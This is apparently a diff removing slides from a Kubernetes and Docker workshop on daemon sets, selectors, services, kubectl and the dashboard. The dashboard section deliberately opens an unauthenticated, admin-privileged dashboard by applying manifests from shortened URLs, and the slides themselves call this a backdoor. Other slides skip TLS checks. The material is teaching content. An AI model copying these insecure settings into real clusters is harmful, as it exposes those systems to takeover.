- Kubernetes puts a very strong emphasis on being *declarative*

- Declarative:

  *I want a cup of tea. Make it happen.*

- Imperative:

  *Boil some water. Pour it in a teapot. Add tea leaves. Steep for a while. Serve in cup.*

--

- Declarative seems simpler at first ...

--

- ... As long as you know how to brew tea

---

## Declarative vs imperative

- What declarative would really be:

  *I want a cup of tea, obtained by pouring an infusion¹ of tea leaves in a cup.*

--

  *¹An infusion is obtained by letting the object steep a few minutes in hot² water.*

--

  *²Hot liquid is obtained by pouring it in an appropriate container³ and setting it on a stove.*

--

  *³Ah, finally, containers! Something we know about. Let's get to work, shall we?*

---

## Declarative vs imperative

- Imperative systems:

  - simpler

  - if a task is interrupted, we have to restart from scratch

- Declarative systems:

  - if a task is interrupted (or if we show up to the party half-way through),
    we can figure out what's missing and do only what's necessary

  - we need to be able to *observe* the system

  - ... and compute a "diff" between *what we have* and *what we want*

---

## Declarative vs imperative in Kubernetes

- Virtually everything we create in Kubernetes is created from a *spec*

- Watch for the `spec` fields in the YAML files later!

- The *spec* describes *how we want the thing to be*

- Kubernetes will *reconcile* the current state with the spec
  <br/>(technically, this is done by a number of *controllers*)

- When we want to change some resource, we update the *spec*

- Kubernetes will then *converge* that resource
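
To make the reconciliation loop concrete, here is a small sketch (the `web` deployment name is illustrative; any deployment would do):

```bash
kubectl run web --image=nginx --replicas=3   # declare the desired state
kubectl get pods -w                          # watch the controllers converge to it
# The spec still says "3 replicas", so if we delete the matching pods,
# Kubernetes immediately creates replacements:
kubectl delete pod -l run=web
```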
@@ -1,371 +0,0 @@
# Daemon sets

- Remember: we did all that cluster orchestration business for `rng`

- We want one (and exactly one) instance of `rng` per node

- If we just scale `deploy/rng` to 4, nothing guarantees that they spread

- Instead of a `deployment`, we will use a `daemonset`

- Daemon sets are great for cluster-wide, per-node processes:

  - `kube-proxy`
  - `weave` (our overlay network)
  - monitoring agents
  - hardware management tools (e.g. SCSI/FC HBA agents)
  - etc.

- They can also be restricted to run [only on some nodes](https://kubernetes.io/docs/concepts/workloads/controllers/daemonset/#running-pods-on-only-some-nodes)

---

## Creating a daemon set

- Unfortunately, as of Kubernetes 1.8, the CLI cannot create daemon sets

--

- More precisely: it doesn't have a subcommand to create a daemon set

--

- But any kind of resource can always be created by providing a YAML description:
  ```bash
  kubectl apply -f foo.yaml
  ```

--

- How do we create the YAML file for our daemon set?

--

  - option 1: read the docs

--

  - option 2: `vi` our way out of it

---

## Creating the YAML file for our daemon set

- Let's start with the YAML file for the current `rng` resource

.exercise[

- Dump the `rng` resource in YAML:
  ```bash
  kubectl get deploy/rng -o yaml --export >rng.yml
  ```

- Edit `rng.yml`

]

Note: `--export` will remove "cluster-specific" information, i.e.:
- namespace (so that the resource is not tied to a specific namespace)
- status and creation timestamp (useless when creating a new resource)
- resourceVersion and uid (these would cause... *interesting* problems)

---

## "Casting" a resource to another

- What if we just changed the `kind` field?

  (It can't be that easy, right?)

.exercise[

- Change `kind: Deployment` to `kind: DaemonSet`

- Save, quit

- Try to create our new resource:
  ```bash
  kubectl apply -f rng.yml
  ```

]

--

We all knew this couldn't be that easy, right!

---

## Understanding the problem

- The core of the error is:
  ```
  error validating data:
  [ValidationError(DaemonSet.spec):
  unknown field "replicas" in io.k8s.api.extensions.v1beta1.DaemonSetSpec,
  ...
  ```

--

- *Obviously,* it doesn't make sense to specify a number of replicas for a daemon set

--

- Workaround: fix the YAML

  - remove the `replicas` field
  - remove the `strategy` field (which defines the rollout mechanism for a deployment)
  - remove the `status: {}` line at the end

--

- Or, we could also ...

---

## Use the `--force`, Luke

- We could also tell Kubernetes to ignore these errors and try anyway

- The actual name of the `--force` flag is `--validate=false`

.exercise[

- Try to load our YAML file and ignore errors:
  ```bash
  kubectl apply -f rng.yml --validate=false
  ```

]

--

Wait ... Now, can it be *that* easy?

---

## Checking what we've done

- Did we transform our `deployment` into a `daemonset`?

.exercise[

- Look at the resources that we have now:
  ```bash
  kubectl get all
  ```

]

--

We have both `deploy/rng` and `ds/rng` now!

--

And one pod too many ...

---

## Explanation

- You can have different resource types with the same name

  (i.e. a *deployment* and a *daemonset* both named `rng`)

- We still have the old `rng` *deployment*

- But now we have the new `rng` *daemonset* as well

- If we look at the pods, we have:

  - *one pod* for the deployment

  - *one pod per node* for the daemonset

---

## What are all these pods doing?

- Let's check the logs of all these `rng` pods

- All these pods have a `run=rng` label:

  - the first pod, because that's what `kubectl run` does
  - the other ones (in the daemon set), because we
    *copied the spec from the first one*

- Therefore, we can query everybody's logs using that `run=rng` selector

.exercise[

- Check the logs of all the pods having a label `run=rng`:
  ```bash
  kubectl logs -l run=rng --tail 1
  ```

]

--

It appears that *all the pods* are serving requests at the moment.

---

## The magic of selectors

- The `rng` *service* is load balancing requests to a set of pods

- This set of pods is defined as "pods having the label `run=rng`"

.exercise[

- Check the *selector* in the `rng` service definition:
  ```bash
  kubectl describe service rng
  ```

]

When we created additional pods with this label, they were
automatically detected by `svc/rng` and added as *endpoints*
to the associated load balancer.

---

## Removing the first pod from the load balancer

- What would happen if we removed that pod, with `kubectl delete pod ...`?

--

  The `replicaset` would re-create it immediately.

--

- What would happen if we removed the `run=rng` label from that pod?

--

  The `replicaset` would re-create it immediately.

--

  ... Because what matters to the `replicaset` is the number of pods *matching that selector.*

--

- But but but ... Don't we have more than one pod with `run=rng` now?

--

  The answer lies in the exact selector used by the `replicaset` ...

---

## Deep dive into selectors

- Let's look at the selectors for the `rng` *deployment* and the associated *replica set*

.exercise[

- Show detailed information about the `rng` deployment:
  ```bash
  kubectl describe deploy rng
  ```

- Show detailed information about the `rng` replica set:
  <br/>(The second command doesn't require you to get the exact name of the replica set)
  ```bash
  kubectl describe rs rng-yyyy
  kubectl describe rs -l run=rng
  ```

]

--

The replica set selector also has a `pod-template-hash`, unlike the pods in our daemon set.

---

# Updating a service through labels and selectors

- What if we want to drop the `rng` deployment from the load balancer?

- Option 1:

  - destroy it

- Option 2:

  - add an extra *label* to the daemon set

  - update the service *selector* to refer to that *label*

--

Of course, option 2 offers more learning opportunities. Right?

---

## Add an extra label to the daemon set

- We will update the daemon set "spec"

- Option 1:

  - edit the `rng.yml` file that we used earlier

  - `kubectl apply -f rng.yml` to load the new definition

- Option 2:

  - use `kubectl edit`

.exercise[

- Use one of the two options!

]

---

## A few possible gotchas ...

- There is a difference between:

  - the label(s) of a resource (in the `metadata` block in the beginning)

  - the selector of a resource (in the `spec` block)

  - the label(s) of the resource(s) created by the first resource (in the `template` block)

- You want to update the selector and the template (at least)

- The template must match the selector

  (i.e. the resource will refuse to create resources that it will not select)

- In YAML, `yes` should be quoted; i.e. `isactive: "yes"`

---

## Wrapping up

.exercise[

- Update the replica set selector and template label

- Update the service selector

- Check the logs of all `run=rng` pods to check that only 4 of them are now active

- Look at the pods that we have right now

- Bonus exercise 1: clean up the pods of the "old" daemon set

- Bonus exercise 2: what could we have done to avoid creating new pods?

]
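
For reference, here is one possible way to carry out the first steps of this exercise (a sketch; the `isactive` label reuses the example from the gotchas slide and is purely illustrative):

```bash
# Add the new label to the daemon set's selector and pod template:
kubectl edit ds/rng     # set isactive: "yes" in the selector and template labels

# Then point the service at pods carrying that label:
kubectl edit svc/rng    # add isactive: "yes" to the spec.selector block

# Check which pods are now behind the service:
kubectl describe svc/rng | grep Endpoints
```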
@@ -1,179 +0,0 @@
# The Kubernetes dashboard

- Kubernetes resources can also be viewed with a web dashboard

- We are going to deploy that dashboard with *three commands:*

  - one to actually *run* the dashboard

  - one to make the dashboard available from outside

  - one to bypass authentication for the dashboard

--

.footnote[.warning[Yes, this will open our cluster to all kinds of shenanigans. Don't do this at home.]]

---

## Running the dashboard

- We need to create a *deployment* and a *service* for the dashboard

- But also a *secret*, a *service account*, a *role* and a *role binding*

- All these things can be defined in a YAML file and created with `kubectl apply -f`

.exercise[

- Create all the dashboard resources, with the following command:
  ```bash
  kubectl apply -f https://goo.gl/Qamqab
  ```

]

The goo.gl URL expands to:
<br/>
.small[https://raw.githubusercontent.com/kubernetes/dashboard/master/src/deploy/recommended/kubernetes-dashboard.yaml]

---

## Making the dashboard reachable from outside

- The dashboard is exposed through a `ClusterIP` service

- We need a `NodePort` service instead

.exercise[

- Edit the service:
  ```bash
  kubectl edit service kubernetes-dashboard
  ```

]

--

`NotFound`?!? Y U NO WORK?!?

---

## Editing the `kubernetes-dashboard` service

- If we look at the YAML that we loaded just before, we'll get a hint

--

- The dashboard was created in the `kube-system` namespace

.exercise[

- Edit the service:
  ```bash
  kubectl -n kube-system edit service kubernetes-dashboard
  ```

- Change `ClusterIP` to `NodePort`, save, and exit

- Check the port that was assigned with `kubectl -n kube-system get services`

]
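
The assigned port can also be retrieved programmatically, mirroring the `jq` trick used elsewhere in this material (a sketch; it assumes `jq` is installed):

```bash
NODEPORT=$(kubectl -n kube-system get svc/kubernetes-dashboard -o json |
           jq .spec.ports[0].nodePort)
echo $NODEPORT
```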
---

## Connecting to the dashboard

.exercise[

- Connect to https://oneofournodes:3xxxx/

  (You will have to work around the TLS certificate validation warning)

]

- We have three authentication options at this point:

  - token (associated with a role that has appropriate permissions)

  - kubeconfig (e.g. using the `~/.kube/config` file from `node1`)

  - "skip" (use the dashboard "service account")

- Let's use "skip": we get a bunch of warnings and don't see much

---

## Granting more rights to the dashboard

- The dashboard documentation [explains how to do this](https://github.com/kubernetes/dashboard/wiki/Access-control#admin-privileges)

- We just need to load another YAML file!

.exercise[

- Grant admin privileges to the dashboard so we can see our resources:
  ```bash
  kubectl apply -f https://goo.gl/CHsLTA
  ```

- Reload the dashboard and enjoy!

]

--

.warning[By the way, we just added a backdoor to our Kubernetes cluster!]

---

# Security implications of `kubectl apply`

- When we do `kubectl apply -f <URL>`, we create arbitrary resources

- Resources can be evil; imagine a `deployment` that ...

--

  - starts bitcoin miners on the whole cluster

--

  - hides in a non-default namespace

--

  - bind-mounts our nodes' filesystem

--

  - inserts SSH keys in the root account (on the node)

--

  - encrypts our data and ransoms it

--

  - ☠️☠️☠️

---

## `kubectl apply` is the new `curl | sh`

- `curl | sh` is convenient

- It's safe if you use HTTPS URLs from trusted sources

--

- `kubectl apply -f` is convenient

- It's safe if you use HTTPS URLs from trusted sources

--

- It introduces new failure modes

- Example: the official setup instructions for most pod networks
@@ -1,181 +0,0 @@
chat: https://dockercommunity.slack.com/messages/C7ET1GY4Q

exclude:
- self-paced
- snap
- auto-btp
- benchmarking
- elk-manual
- prom-manual

chapters:
- |
  class: title

  .small[

  Swarm: from Zero to Hero

  .small[.small[

  **Be kind to the WiFi!**

  *Use the 5G network*
  <br/>
  *Don't use your hotspot*
  <br/>
  *Don't stream videos from YouTube, Netflix, etc.
  <br/>(if you're bored, watch local content instead)*

  Also: share the power outlets
  <br/>
  *(with limited power comes limited responsibility?)*
  <br/>
  *(or something?)*

  Thank you!

  ]
  ]
  ]

  ---

  ## Intros

  <!--
  - Hello! We are
    AJ ([@s0ulshake](https://twitter.com/s0ulshake))
    &
    Jérôme ([@jpetazzo](https://twitter.com/jpetazzo))
  -->

  - Hello! We are Jérôme, Lee, Nicholas, and Scott

  <!--
  I am
  Jérôme ([@jpetazzo](https://twitter.com/jpetazzo))
  -->

  --

  - This is our collective Docker knowledge:

    <!-- image: our collective Docker knowledge -->

  ---

  ## "From zero to hero"

  --

  - It rhymes, but it's a pretty bad title, to be honest

  --

  - None of you is a "zero"

  --

  - None of us is a "hero"

  --

  - None of us should even try to be a hero

  --

  *The hero syndrome is a phenomenon affecting people who seek heroism or recognition,
  usually by creating a desperate situation which they can resolve.
  This can include unlawful acts, such as arson.
  The phenomenon has been noted to affect civil servants,
  such as firefighters, nurses, police officers, and security guards.*

  (Wikipedia page on [hero syndrome](https://en.wikipedia.org/wiki/Hero_syndrome))

  ---

  ## Agenda

  .small[
  - 09:00-09:10 Hello!
  - 09:10-10:30 Part 1
  - 10:30-11:00 coffee break
  - 11:00-12:30 Part 2
  - 12:30-13:30 lunch break
  - 13:30-15:00 Part 3
  - 15:00-15:30 coffee break
  - 15:30-17:00 Part 4
  - 17:00-18:00 Afterhours and Q&A
  ]

  <!--
  - The tutorial will run from 9:00am to 12:20pm

  - This will be fast-paced, but DON'T PANIC!

  - There will be a coffee break at 10:30am
    <br/>
    (please remind me if I forget about it!)
  -->

  - All the content is publicly available (slides, code samples, scripts)

    Upstream URL: https://github.com/jpetazzo/orchestration-workshop

  - Feel free to interrupt for questions at any time

  - Live feedback, questions, help on [Gitter](chat)

    http://container.training/chat

- intro.md
- |
  @@TOC@@
- - prereqs.md
  - versions.md
  - |
    class: title

    All right!
    <br/>
    We're all set.
    <br/>
    Let's do this.
  - sampleapp.md
  - swarmkit.md
  - creatingswarm.md
  - morenodes.md
- - firstservice.md
  - ourapponswarm.md
  - updatingservices.md
  - healthchecks.md
- - operatingswarm.md
  - netshoot.md
  - ipsec.md
  - swarmtools.md
  - security.md
  - secrets.md
  - encryptionatrest.md
  - leastprivilege.md
  - apiscope.md
- - logging.md
  - metrics.md
  - stateful.md
  - extratips.md
  - end.md
- |
  class: title

  That's all folks! <br/> Questions?

  .small[.small[

  Jérôme ([@jpetazzo](https://twitter.com/jpetazzo)) — [@docker](https://twitter.com/docker)

  ]]

  <!--
  Tiffany ([@tiffanyfayj](https://twitter.com/tiffanyfayj))
  AJ ([@s0ulshake](https://twitter.com/s0ulshake))
  -->
38
docs/end.md
@@ -1,38 +0,0 @@
class: title, extra-details

# What's next?

## (What to expect in future versions of this workshop)

---

class: extra-details

## Implemented and stable, but out of scope

- [Docker Content Trust](https://docs.docker.com/engine/security/trust/content_trust/) and
  [Notary](https://github.com/docker/notary) (image signature and verification)

- Image security scanning (many products available, Docker Inc. and 3rd party)

- [Docker Cloud](https://cloud.docker.com/) and
  [Docker Datacenter](https://www.docker.com/products/docker-datacenter)
  (commercial offering with node management, secure registry, CI/CD pipelines, all the bells and whistles)

- Network and storage plugins

---

class: extra-details

## Work in progress

- Demo at least one volume plugin
  <br/>(bonus points if it's a distributed storage system)

- ..................................... (your favorite feature here)

Reminder: there is a tag for each iteration of the content
in the GitHub repository.

It makes it easy to come back later and check what has changed since you did it!
@@ -1,89 +0,0 @@
exclude:
- self-paced
- snap

chat: "FIXME"

chapters:
- |
  class: title

  .small[

  Deploying and scaling microservices <br/> with Docker and Kubernetes

  .small[.small[

  **Be kind to the WiFi!**

  *Use the 5G network*
  <br/>
  *Don't use your hotspot*
  <br/>
  *Don't stream videos from YouTube, Netflix, etc.
  <br/>(if you're bored, watch local content instead)*

  Thank you!

  ]
  ]
  ]

  ---

  ## Intros

  - Hello! I am
    Jérôme ([@jpetazzo](https://twitter.com/jpetazzo))

  --

  - This is my first time doing this

  ---

  ## Logistics

  - The tutorial will run from 9:00am to 12:15pm

  - There will be a coffee break at 10:30am
    <br/>
    (please remind me if I forget about it!)

  - All the content is publicly available (slides, code samples, scripts)

    Upstream URL: https://github.com/jpetazzo/orchestration-workshop

  - Feel free to interrupt for questions at any time

  - Live feedback, questions, help on [Gitter](chat)

    http://container.training/chat

- intro.md
- |
  @@TOC@@
- - prereqs-k8s.md
  - versions-k8s.md
  - sampleapp.md
- - concepts-k8s.md
  - kubectlget.md
  - setup-k8s.md
  - kubectlrun.md
- - kubectlexpose.md
  - ourapponkube.md
  - dashboard.md
- - kubectlscale.md
  - daemonset.md
  - rollout.md
  - whatsnext.md
- |
  class: title

  That's all folks! <br/> Questions?

  .small[.small[

  Jérôme ([@jpetazzo](https://twitter.com/jpetazzo)) — [@docker](https://twitter.com/docker)

  ]]
@@ -1,138 +0,0 @@
# Exposing containers

- `kubectl expose` creates a *service* for existing pods

- A *service* is a stable address for a pod (or a bunch of pods)

- If we want to connect to our pod(s), we need to create a *service*

- Once a service is created, `kube-dns` will allow us to resolve it by name

  (i.e. after creating service `hello`, the name `hello` will resolve to something)

- There are different types of services, detailed on the following slides:

  `ClusterIP`, `NodePort`, `LoadBalancer`, `ExternalName`
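
To see that name resolution in action, one could run a throwaway pod (a sketch; `hello` is the hypothetical service from the example above):

```bash
kubectl run -it --rm dnstest --image=alpine -- nslookup hello
```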
---

## Basic service types

- `ClusterIP` (default type)

  - a virtual IP address is allocated for the service (in an internal, private range)
  - this IP address is reachable only from within the cluster (nodes and pods)
  - our code can connect to the service using the original port number

- `NodePort`

  - a port is allocated for the service (by default, in the 30000-32768 range)
  - that port is made available *on all our nodes* and anybody can connect to it
  - our code must be changed to connect to that new port number

These service types are always available.

Under the hood: `kube-proxy` is using a userland proxy and a bunch of `iptables` rules.

---

## More service types

- `LoadBalancer`

  - an external load balancer is allocated for the service
  - the load balancer is configured accordingly
    <br/>(e.g.: a `NodePort` service is created, and the load balancer sends traffic to that port)

- `ExternalName`

  - the DNS entry managed by `kube-dns` will just be a `CNAME` to a provided record
  - no port, no IP address, nothing else is allocated

The `LoadBalancer` type is currently only available on AWS, Azure, and GCE.
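
As an illustration, the service type is chosen at creation time (a sketch; the `hello` deployment is hypothetical):

```bash
# ClusterIP (the default): an internal virtual IP only
kubectl expose deploy/hello --port 80

# NodePort: additionally opens a port (30000-32768) on every node
kubectl expose deploy/hello --port 80 --type=NodePort
```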
---

## Running containers with open ports

- Since `ping` doesn't have anything to connect to, we'll have to run something else

.exercise[

- Start a bunch of ElasticSearch containers:
  ```bash
  kubectl run elastic --image=elasticsearch:2 --replicas=7
  ```

- Watch them being started:
  ```bash
  kubectl get pods -w
  ```

]

The `-w` option "watches" events happening on the specified resources.

Note: please DO NOT call the service `search`. It would collide with the TLD.

---

## Exposing our deployment

- We'll create a default `ClusterIP` service

.exercise[

- Expose the ElasticSearch HTTP API port:
  ```bash
  kubectl expose deploy/elastic --port 9200
  ```

- Look up which IP address was allocated:
  ```bash
  kubectl get svc
  ```

]

---

## Services are layer 4 constructs

- You can assign IP addresses to services, but they are still *layer 4*

  (i.e. a service is not an IP address; it's an IP address + protocol + port)

- This is caused by the current implementation of `kube-proxy`

  (it relies on mechanisms that don't support layer 3)

- As a result: you *have to* indicate the port number for your service

- Running services with arbitrary ports (or port ranges) requires hacks

  (e.g. host networking mode)

---

## Testing our service

- We will now send a few HTTP requests to our ElasticSearch pods

.exercise[

- Let's obtain the IP address that was allocated for our service, *programmatically:*
  ```bash
  IP=$(kubectl get svc elastic -o go-template --template '{{ .spec.clusterIP }}')
  ```

- Send a few requests:
  ```bash
  curl http://$IP:9200/
  ```

]

--

Our requests are load balanced across multiple pods.
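
To observe the load balancing, we can look at the `name` field returned by ElasticSearch, which differs from pod to pod (a sketch assuming `jq` is available):

```bash
for i in $(seq 3); do curl -s http://$IP:9200/ | jq .name; done
```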
@@ -1,234 +0,0 @@
# First contact with `kubectl`

- `kubectl` is (almost) the only tool we'll need to talk to Kubernetes

- It is a rich CLI tool around the Kubernetes API

  (Everything you can do with `kubectl`, you can do directly with the API)

- On our machines, there is a `~/.kube/config` file with:

  - the Kubernetes API address

  - the path to our TLS certificates used to authenticate

- You can also use the `--kubeconfig` flag to pass a config file

- Or directly `--server`, `--user`, etc.

- `kubectl` can be pronounced "Cube C T L", "Cube cuttle", "Cube cuddle"...
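
A quick way to inspect that configuration (a sketch; the explicit flag uses an illustrative path):

```bash
kubectl config view                          # show the current configuration
kubectl --kubeconfig=/path/to/config get no  # or point at another config file
```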
---

## `kubectl get`

- Let's look at our `Node` resources with `kubectl get`!

.exercise[

- Look at the composition of our cluster:
  ```bash
  kubectl get node
  ```

- These commands are equivalent:
  ```bash
  kubectl get no
  kubectl get node
  kubectl get nodes
  ```

]

---

## From human-readable to machine-readable output

- `kubectl get` can output JSON, YAML, or be directly formatted

.exercise[

- Give us more info about them nodes:
  ```bash
  kubectl get nodes -o wide
  ```

- Let's have some YAML:
  ```bash
  kubectl get no -o yaml
  ```
  See that `kind: List` at the end? It's the type of our result!

]

---

## (Ab)using `kubectl` and `jq`

- It's super easy to build custom reports

.exercise[

- Show the capacity of all our nodes as a stream of JSON objects:
  ```bash
  kubectl get nodes -o json |
          jq ".items[] | {name:.metadata.name} + .status.capacity"
  ```

]

---

## What's available?

- `kubectl` has pretty good introspection facilities

- We can list all available resource types by running `kubectl get`

- We can view details about a resource with:
  ```bash
  kubectl describe type/name
  kubectl describe type name
  ```

- We can view the definition for a resource type with:
  ```bash
  kubectl explain type
  ```

Each time, `type` can be singular, plural, or abbreviated type name.

---

## Services

- A *service* is a stable endpoint to connect to "something"

  (In the initial proposal, they were called "portals")

.exercise[

- List the services on our cluster with one of these commands:
  ```bash
  kubectl get services
  kubectl get svc
  ```

]

--

There is already one service on our cluster: the Kubernetes API itself.

---

## ClusterIP services

- A `ClusterIP` service is internal, available from the cluster only

- This is useful for introspection from within containers

.exercise[

- Try to connect to the API:
  ```bash
  curl -k https://`10.96.0.1`
  ```

  - `-k` is used to skip certificate verification
  - Make sure to replace 10.96.0.1 with the CLUSTER-IP shown earlier

]

--

The error that we see is expected: the Kubernetes API requires authentication.

---

## Listing running containers

- Containers are manipulated through *pods*

- A pod is a group of containers:

  - running together (on the same node)

  - sharing resources (RAM, CPU; but also network, volumes)

.exercise[

- List pods on our cluster:
  ```bash
  kubectl get pods
  ```

]

--

*These are not the pods you're looking for.* But where are they?!?

---

## Namespaces

- Namespaces allow us to segregate resources

.exercise[

- List the namespaces on our cluster with one of these commands:
  ```bash
  kubectl get namespaces
  kubectl get namespace
  kubectl get ns
  ```

]

--

*You know what ... This `kube-system` thing looks suspicious.*

---

## Accessing namespaces

- By default, `kubectl` uses the `default` namespace

- We can switch to a different namespace with the `-n` option

.exercise[

- List the pods in the `kube-system` namespace:
  ```bash
  kubectl -n kube-system get pods
  ```

]

--

*Ding ding ding ding ding!*

---

## What are all these pods?

- `etcd` is our etcd server

- `kube-apiserver` is the API server

- `kube-controller-manager` and `kube-scheduler` are other master components

- `kube-dns` is an additional component (not mandatory but super useful, so it's there)

- `kube-proxy` is the (per-node) component managing port mappings and such

- `weave` is the (per-node) component managing the network overlay

- the `READY` column indicates the number of containers in each pod

- the pods with a name ending with `-ip-172-31-XX-YY` are the master components
  <br/>
  (they have been specifically "pinned" to the master node)
@@ -1,197 +0,0 @@
# Running our first containers on Kubernetes

- First things first: we cannot run a container

--

- We are going to run a pod, and in that pod there will be a single container

--

- In that container in the pod, we are going to run a simple `ping` command

- Then we are going to start additional copies of the pod

---

## Starting a simple pod with `kubectl run`

- We need to specify at least a *name* and the image we want to use

.exercise[

- Let's ping `goo.gl`:
  ```bash
  kubectl run pingpong --image alpine ping goo.gl
  ```

]

--

OK, what just happened?

---

## Behind the scenes of `kubectl run`

- Let's look at the resources that were created by `kubectl run`

.exercise[

- List most resource types:
  ```bash
  kubectl get all
  ```

]

--

We should see the following things:
- `deploy/pingpong` (the *deployment* that we just created)
- `rs/pingpong-xxxx` (a *replica set* created by the deployment)
- `po/pingpong-yyyy` (a *pod* created by the replica set)

---

## Deployments, replica sets, and replication controllers

- A *deployment* is a high-level construct

  - allows scaling, rolling updates, rollbacks

  - multiple deployments can be used together to implement a
    [canary deployment](https://kubernetes.io/docs/concepts/cluster-administration/manage-deployment/#canary-deployments)

  - delegates pods management to *replica sets*

- A *replica set* is a low-level construct

  - makes sure that a given number of identical pods are running

  - allows scaling

  - rarely used directly

- A *replication controller* is the (deprecated) predecessor of a replica set

---

## Our `pingpong` deployment

- `kubectl run` created a *deployment*, `deploy/pingpong`

- That deployment created a *replica set*, `rs/pingpong-xxxx`

- That replica set created a *pod*, `po/pingpong-yyyy`

- We'll see later how these folks play together for:

  - scaling

  - high availability

  - rolling updates

---

## Viewing container output

- Let's use the `kubectl logs` command

- We will pass either a *pod name*, or a *type/name*

  (E.g. if we specify a deployment or replica set, it will get the first pod in it)

- Unless specified otherwise, it will only show logs of the first container in the pod

  (Good thing there's only one in ours!)

.exercise[

- View the result of our `ping` command:
  ```bash
  kubectl logs deploy/pingpong
  ```

]

---

## Streaming logs in real time

- Just like `docker logs`, `kubectl logs` supports convenient options:

  - `-f`/`--follow` to stream logs in real time (à la `tail -f`)

  - `--tail` to indicate how many lines you want to see (from the end)

  - `--since` to get logs only after a given timestamp

.exercise[

- View the latest logs of our `ping` command:
  ```bash
  kubectl logs deploy/pingpong --tail 1 --follow
  ```

]

---

## Scaling our application

- We can create additional copies of our container (I mean, our pod) with `kubectl scale`

.exercise[

- Scale our `pingpong` deployment:
  ```bash
  kubectl scale deploy/pingpong --replicas 8
  ```

]

Note: what if we tried to scale `rs/pingpong-xxxx`?

We could! But the *deployment* would notice it right away, and scale back to the initial level.
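
Here is what that experiment could look like (a sketch; the `xxxx` suffix stands for the actual generated replica set name):

```bash
kubectl scale rs/pingpong-xxxx --replicas 1
kubectl get pods -w   # the deployment notices, and scales back to 8
```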
---

## Viewing logs of multiple pods

- When we specify a deployment name, only one single pod's logs are shown

- We can view the logs of multiple pods by specifying a *selector*

- A selector is a logic expression using *labels*

- Conveniently, when you `kubectl run somename`, the associated objects have a `run=somename` label

.exercise[

- View the last line of log from all pods with the `run=pingpong` label:
  ```bash
  kubectl logs -l run=pingpong --tail 1
  ```

]

Unfortunately, `--follow` cannot (yet) be used to stream the logs from multiple containers.

---

class: title

.small[
Meanwhile, at the Google NOC ...

.small[
Why the hell
<br/>
are we getting 1000 packets per second
<br/>
of ICMP ECHO traffic from EC2 ?!?
]
]
@@ -1,5 +0,0 @@
#!/bin/sh
while true; do
  find . |
    entr -d . sh -c "DEBUG=1 ./markmaker.py < kube.yml > workshop.md"
done
@@ -1,92 +0,0 @@
#!/usr/bin/env python
# transforms a YAML manifest into a HTML workshop file

import glob
import logging
import os
import re
import sys
import yaml


if os.environ.get("DEBUG") == "1":
    logging.basicConfig(level=logging.DEBUG)


class InvalidChapter(ValueError):

    def __init__(self, chapter):
        ValueError.__init__(self, "Invalid chapter: {!r}".format(chapter))


def generatefromyaml(manifest):
    manifest = yaml.load(manifest)

    markdown, titles = processchapter(manifest["chapters"], "<inline>")
    logging.debug(titles)
    toc = gentoc(titles)
    markdown = markdown.replace("@@TOC@@", toc)

    exclude = manifest.get("exclude", [])
    logging.debug("exclude={!r}".format(exclude))
    if not exclude:
        logging.warning("'exclude' is empty.")
    exclude = ",".join('"{}"'.format(c) for c in exclude)

    html = open("workshop.html").read()
    html = html.replace("@@MARKDOWN@@", markdown)
    html = html.replace("@@EXCLUDE@@", exclude)
    html = html.replace("@@CHAT@@", manifest["chat"])
    return html


def gentoc(titles, depth=0, chapter=0):
    if not titles:
        return ""
    if isinstance(titles, str):
        return " "*(depth-2) + "- " + titles + "\n"
    if isinstance(titles, list):
        if depth==0:
            sep = "\n\n<!-- auto-generated TOC -->\n---\n\n"
            head = ""
            tail = ""
        elif depth==1:
            sep = "\n"
            head = "## Chapter {}\n\n".format(chapter)
            tail = ""
        else:
            sep = "\n"
            head = ""
            tail = ""
        return head + sep.join(gentoc(t, depth+1, c+1) for (c,t) in enumerate(titles)) + tail


# Arguments:
# - `chapter` is a string; if it has multiple lines, it will be used as
#   a markdown fragment; otherwise it will be considered as a file name
#   to be recursively loaded and parsed
# - `filename` is the name of the file that we're currently processing
#   (to generate inline comments to facilitate editing)
# Returns: (expandedmarkdown, [list of titles])
# The list of titles can be nested.
def processchapter(chapter, filename):
    if isinstance(chapter, unicode):
        return processchapter(chapter.encode("utf-8"), filename)
    if isinstance(chapter, str):
        if "\n" in chapter:
            titles = re.findall("^# (.*)", chapter, re.MULTILINE)
            slidefooter = "<!-- {} -->".format(filename)
            chapter = chapter.replace("\n---\n", "\n{}\n---\n".format(slidefooter))
            chapter += "\n" + slidefooter
            return (chapter, titles)
        if os.path.isfile(chapter):
            return processchapter(open(chapter).read(), chapter)
    if isinstance(chapter, list):
        chapters = [processchapter(c, filename) for c in chapter]
        markdown = "\n---\n".join(c[0] for c in chapters)
        titles = [t for (m,t) in chapters if t]
        return (markdown, titles)
    raise InvalidChapter(chapter)


sys.stdout.write(generatefromyaml(sys.stdin))
@@ -1,348 +0,0 @@
|
||||
class: title
|
||||
|
||||
Our app on Kube
|
||||
|
||||
---
|
||||
|
||||
## What's on the menu?
|
||||
|
||||
In this part, we will:
|
||||
|
||||
- **build** images for our app,
|
||||
|
||||
- **ship** these images with a registry,
|
||||
|
||||
- **run** deployments using these images,
|
||||
|
||||
- expose these deployments so they can communicate with each other,
|
||||
|
||||
- expose the web UI so we can access it from outside.
|
||||
|
||||
---
|
||||
|
||||
## The plan
|
||||
|
||||
- Build on our control node (`node1`)
|
||||
|
||||
- Tag images so that they are named `$REGISTRY/servicename`
|
||||
|
||||
- Upload them to a registry
|
||||
|
||||
- Create deployments using the images
|
||||
|
||||
- Expose (with a ClusterIP) the services that need to communicate
|
||||
|
||||
- Expose (with a NodePort) the WebUI
|
||||
|
||||
---
|
||||
|
||||
## Which registry do we want to use?
|
||||
|
||||
- We could use the Docker Hub
|
||||
|
||||
- Or a service offered by our cloud provider (GCR, ECR...)
|
||||
|
||||
- Or we could just self-host that registry
|
||||
|
||||
*We'll self-host the registry because it's the most generic solution for this workshop.*
|
||||
|
||||
---
|
||||
|
||||
## Using the open source registry
|
||||
|
||||
- We need to run a `registry:2` container
|
||||
<br/>(make sure you specify tag `:2` to run the new version!)
|
||||
|
||||
- It will store images and layers to the local filesystem
|
||||
<br/>(but you can add a config file to use S3, Swift, etc.)
|
||||
|
||||
- Docker *requires* TLS when communicating with the registry
|
||||
|
||||
  - except for registries on `127.0.0.0/8` (i.e. `localhost`)
|
||||
|
||||
  - or with the Engine flag `--insecure-registry` (see the example after this list)
|
||||
|
||||
- Our strategy: publish the registry container on a NodePort,
|
||||
<br/>so that it's available through `127.0.0.1:xxxxx` on each node
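
For reference, the daemon-level escape hatch mentioned above looks like this; it is a sketch, and the registry address is an assumption:

```bash
# Overwrites any existing daemon.json; merge by hand if you already have one.
echo '{ "insecure-registries": ["myregistry.example.com:5000"] }' \
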